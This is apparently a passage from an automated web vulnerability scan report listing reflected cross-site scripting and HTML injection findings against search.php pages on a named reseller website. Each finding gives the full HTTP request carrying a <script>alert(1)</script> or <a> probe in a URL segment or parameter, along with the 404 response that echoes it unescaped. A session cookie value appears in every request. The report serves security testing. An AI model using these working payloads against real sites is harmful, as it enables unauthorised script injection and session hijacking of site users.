<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&d83cb<script>alert(1)</script>1d15592a767=1 was not found on this server.</p>
...[SNIP]...

2.1888. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec2de<a>f35ceab2961 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec2de<a>f35ceab2961 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ec2de<a>f35ceab2961 was not found on this server.</p>
...[SNIP]...

2.1889. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee868<script>alert(1)</script>7469ac45a9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailee868<script>alert(1)</script>7469ac45a9d/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailee868<script>alert(1)</script>7469ac45a9d/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1890. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cef0e<script>alert(1)</script>b97c40ef5f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23cef0e<script>alert(1)</script>b97c40ef5f8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23cef0e<script>alert(1)</script>b97c40ef5f8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1891. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f4a21<script>alert(1)</script>ef8eb4102c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themesf4a21<script>alert(1)</script>ef8eb4102c3/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themesf4a21<script>alert(1)</script>ef8eb4102c3/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1892. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f45f1<script>alert(1)</script>dcea55209f9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmosf45f1<script>alert(1)</script>dcea55209f9/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmosf45f1<script>alert(1)</script>dcea55209f9/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1893. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 734e4<script>alert(1)</script>87f5bcd7deb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images734e4<script>alert(1)</script>87f5bcd7deb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images734e4<script>alert(1)</script>87f5bcd7deb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1894. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7bcac<script>alert(1)</script>f7142e82ddf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/search.php7bcac<script>alert(1)</script>f7142e82ddf?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php7bcac<script>alert(1)</script>f7142e82ddf?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1895. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d03d7<a>32776ef9432 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd03d7<a>32776ef9432&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd03d7<a>32776ef9432&opt=2 was not found on this server.</p>
...[SNIP]...

2.1896. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c020c<a>4cde2efea6a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...c020c<a>4cde2efea6a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...c020c<a>4cde2efea6a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1897. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 81d77<script>alert(1)</script>e6c34d0f0e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&81d77<script>alert(1)</script>e6c34d0f0e7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&81d77<script>alert(1)</script>e6c34d0f0e7=1 was not found on this server.</p>
...[SNIP]...

2.1898. http://www.resellerbase.com/detail/23/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7a80c<a>4da35a582eb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27a80c<a>4da35a582eb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27a80c<a>4da35a582eb was not found on this server.</p>
...[SNIP]...

2.1899. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload daf8a<script>alert(1)</script>add826db491 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildaf8a<script>alert(1)</script>add826db491/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildaf8a<script>alert(1)</script>add826db491/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1900. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2427<script>alert(1)</script>cdde081f435 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23f2427<script>alert(1)</script>cdde081f435/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23f2427<script>alert(1)</script>cdde081f435/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1901. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 603fb<script>alert(1)</script>c6a3bb77e71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes603fb<script>alert(1)</script>c6a3bb77e71/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes603fb<script>alert(1)</script>c6a3bb77e71/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1902. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 128ba<script>alert(1)</script>42aa5ed8965 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos128ba<script>alert(1)</script>42aa5ed8965/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos128ba<script>alert(1)</script>42aa5ed8965/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1903. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4e6c5<script>alert(1)</script>05200adce96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/search.php4e6c5<script>alert(1)</script>05200adce96?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php4e6c5<script>alert(1)</script>05200adce96?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1904. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 691b3<a>9100540cd6e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search691b3<a>9100540cd6e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search691b3<a>9100540cd6e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1905. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8a0e3<a>fbc7e5452a3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...8a0e3<a>fbc7e5452a3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
